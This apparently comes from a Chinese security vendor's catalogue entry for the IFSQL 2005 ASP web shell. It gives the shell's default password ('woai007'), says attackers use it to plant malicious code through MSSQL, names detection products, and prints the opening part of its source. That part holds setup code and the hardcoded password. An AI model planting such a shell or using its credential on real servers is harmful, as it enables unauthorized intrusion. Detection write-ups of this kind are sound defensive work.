IFSQL 2005

2011-12-13 16:10:25 来源:本站原创,请勿转载 浏览:260
IFSQL 2005

木马名称:IFSQL 2005
木马格式:asp
默认密码:账户密码均为woai007
木马作用:在线管理MSSQL数据库,原本不是黑客工具,不过现在主要用途都是被黑客用来实现MsSQL挂马等挂马操作。
运行界面如下:

总结:IFSQL 2005是一款在线管理MSSQL数据库的工具,通过WEB的方式轻松远程管理的数据库!!原本不是黑客工具,不过现在主要用途都是被黑客用来实现MsSQL挂马等挂马操作。
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 IFSQL 2005 这个asp网页木马。

IFSQL 2005部分代码:
<%@ LANGUAGE = VBScript.Encode %>
<%OPTION EXPLICIT%>
<%
'========================================================================
'========================================================================
Dim sTable, sField, sFieldname, sFieldType, sFieldLen, sRecordSet, sView, sSP, sDB
Dim Cookie_Login, Cookie_DbName, Cookie_DbUid, Cookie_DbPwd, Cookie_DbServer
Dim sAction, ServerIP, strPassword, intID, strScriptName,ThisPage
Dim maxdisplayedbin,maxdisplayedchar
Dim DbName, DbUid, DbPwd, DbServer,DbConnString,DbOwner
Dim sSQL, Rs, Conn, sSort, sOrder
dim i, strmsg,FileCount,fso,thePath
const editableFileExt='$log$asp$txt$php$ini$inc$htm$html$xml$conf$config$jsp$java$htt$bat$lst$aspx$php3$php4$vbs$js$css$bat$asax$asa$'
const AppName = 'IFSQL 2005'
const AppVersion = 'v0.3 Build 20050928'
strPassword = 'woai007'
Cookie_DbName = 'Wyh_DBName'
Cookie_DbUid = 'Wyh_DBUid'
Cookie_DbPwd = 'Wyh_DBPwd'
Cookie_DbServer = 'Wyh_DBServer'
maxdisplayedbin = 16
maxdisplayedchar = 40
ServerIP = Request.ServerVariables('LOCAL_ADDR')
sAction = Trim(Request.QueryString('action'))
sDB = Trim(Request('db'))
sTable = Trim(Request('table'))
sField = Trim(Request('field'))
sView = Trim(Request('view'))
sSP = Trim(Request('sp'))
intID = Trim(Request('id'))
sSort = Trim(Request('sort'))
sOrder = Trim(Request('order'))
thePath = Trim(Request('thepath'))
Function GetScriptName(n_Para)  
 dim strSN
 strSN = CStr(Request.ServerVariables('SCRIPT_NAME'))
 If Cint(n_Para) = 1 then
  If (Request.QueryString <> '') Then
    strSN = strSN & '?' & Server.HTMLEncode(Request.QueryString)
  End If
 End If
 GetScriptName = strSN
End Function

(0)
(0)